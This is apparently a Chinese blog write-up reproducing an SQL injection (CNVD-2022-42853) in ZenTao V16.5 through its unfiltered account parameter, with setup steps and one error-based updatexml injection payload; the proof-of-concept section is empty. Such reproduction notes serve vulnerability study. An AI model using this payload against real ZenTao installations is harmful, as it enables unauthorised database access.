复现禅道V16.5的SQL注入(CNVD-2022-42853)
漏洞详情
禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。
环境搭建
环境下载:禅道V16.5
下载后双击运行,进入目录运行start.exe
直接访问即可
漏洞复现
一、手工注入复现
报错型注入
payload:admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1
结果:
二、POC复现
结语
本文只用于参考学习,一切用于违法,犯罪与本人无关,网络不是法外之地。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异